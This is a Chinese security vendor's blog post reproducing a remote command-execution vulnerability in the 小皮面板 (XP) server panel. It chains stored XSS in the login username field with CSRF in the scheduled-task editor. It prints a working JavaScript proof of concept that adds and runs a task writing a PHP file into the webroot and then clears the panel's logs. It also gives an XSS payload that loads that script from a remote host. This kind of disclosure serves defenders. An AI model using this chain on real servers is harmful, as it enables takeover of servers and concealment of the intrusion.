提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《美创科技隐私条款》
免费试用
400-811-3777

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于美创
    申请试用
      热门阅读
      1

      2025中国互联网产业年会丨《中国互联网产业绿色算力发展倡议》正式发布

      2025-02-07

       2

      美创用户专访 | 精细化管理:医疗行业数据分类分级的策略与实践

      2025-01-10

       3

      容灾演练双月报|美创助力某特大型通信基础设施央企顺利完成多个核心系统异地容灾演练

      2025-01-10

       4

      国家级|美创、徐医附院共建项目入选工信部《2024年网络安全技术应用典型案例拟支持项目名单》

      2024-12-20

       5

      全球数据跨境流动合作倡议

      2024-11-22
      相关文章

      每周安全速递³⁴⁷ | 俄罗斯法院释放多名REvil勒索软件团伙成员引发争议

      2025-06-27

      每周安全速递³⁴⁶ | 勒索团伙声称窃取Freedman HealthCare敏感文件

      2025-06-20

      每周安全速递³⁴⁵ | Play勒索团伙利用SimpleHelp漏洞实施双重勒索

      2025-06-13

      每周安全速递³⁴⁴ | 维多利亚的秘密因网络安全事件推迟2025年一季度财报发布

      2025-06-06

      每周安全速递³⁴³ | Everest勒索软件泄露可口可乐员工数据

      2025-05-30
      小皮面板任意命令执行漏洞复现
      发布时间:2023-02-24 阅读次数: 535 次
      01
      漏洞简介

      小皮面板集安全、高效、功能于一体。支持一键LAMP、LNMP、集群、监控、网站、数据库、FTP、软件中心、伪静态、云备份、SSL、多版本共存、Nginx反向代理、服务器防火墙、web防火墙、监控大屏等100多项服务器管理功能。小皮面板登录接口的username参数值存在存储性XSS漏洞,可通过该存储性XSS漏洞将计划任务写入小皮面板服务器,从而达到命令执行效果。

      02
      影响版本

      • V0.1
      • V0.101

      • V0.102

      03
      环境搭建

      访问


      https://www.xp.cn/windows-panel.html

      点击立即下载

      图片

      下载完成后运行安装程序进行安装

      图片

      安装完成后,桌面生成”小皮面板初始信息.txt”,文本文件中包含面板地址、面板账号密码

      图片

      访问面板地址


      http://:9080/8D92C9

      出现以下界面代表安装成功

      图片
      04
      漏洞复现

      如图所示,在登录界面用户名栏输入payload:<script>alert(1)</script>,密码栏输入任意,验证码栏输入正确的验证码,输入完毕后点击登录

      图片

      再次将用户名、密码、验证码栏处输入正确的用户名、密码以及验证码

      图片

      登录系统后,将触发xss漏洞

      图片

      漏洞起因是由于操作日志中记录了登录失败的用户名,且输出用户名时未进行html编码

      图片

      小皮面板后台可以编辑服务器的计划任务,且编辑计划任务处未校验csrf token与referer,所以编辑计划任务处存在csrf漏洞,可利用存储性XSS与csrf漏洞添加计划任务以达到命令执行效果。

      构造如下JS文件,JS文件内容为发送创建计划任务请求

















      function poc(){  $.get('/service/app/tasks.php?type=task_list',{},function(data){    var id=data.data[0].ID;    $.post('/service/app/tasks.php?type=exec_task',{      tid:id    },function(res2){        $.post('/service/app/log.php?type=clearlog',{         },function(res3){},"json");      },"json");  },"json");}function save(){  var data=new Object();  data.task_id="";  data.title="test";  data.exec_cycle="1";  data.week="1";  data.day="3";  data.hour="12";  data.minute = "00";  data.shell='echo "<?php phpinfo();?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';  $.post('/service/app/tasks.php?type=save_shell',data,function(res){    poc();  },'json');}save();
      图片

      将该JS文件放置在小皮面板能够访问到的web应用中

      在小皮面板的登录界面构造xss payload


      <script src=”http://ip:port/test.js”></script>

      输入任意密码与正确的验证码,点击登录

      图片

      使用正确的账号密码登录小皮面板

      图片

      如图所示,计划任务列表中新的计划任务被添加

      图片

      访问


      http://ip/1.php

      出现phpinfo函数界面

      图片

      05
      漏洞修复

      将小皮面板版本升至最新


      上一条:每周安全速递²⁴⁹|Mount Pleasant中央学区泄露多名学生邮件密码
      下一条:【漏洞通告】 VMware Carbon Black App Control 远程代码执行漏洞(CVE-2023-20858)
      返回
      关注或联系美创
      官方订阅号 官方订阅号
      官方服务号 官方服务号
      第59号 第59号
      服务热线:400-811-3777
      商务合作:marketing@mchz.com.cn
      友情链接 中央网信办 公安部 工信部 CNCERT 中国信通院 中国软件测评中心 国家工业信息安全发展研究中心 赛迪研究院
      Copyright © 2024 杭州美创科技股份有限公司 All rights reserved.
      浙公网安备 33010502006954号 浙ICP备12021012号-1 网站地图 网站声明及隐私保护政策
      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部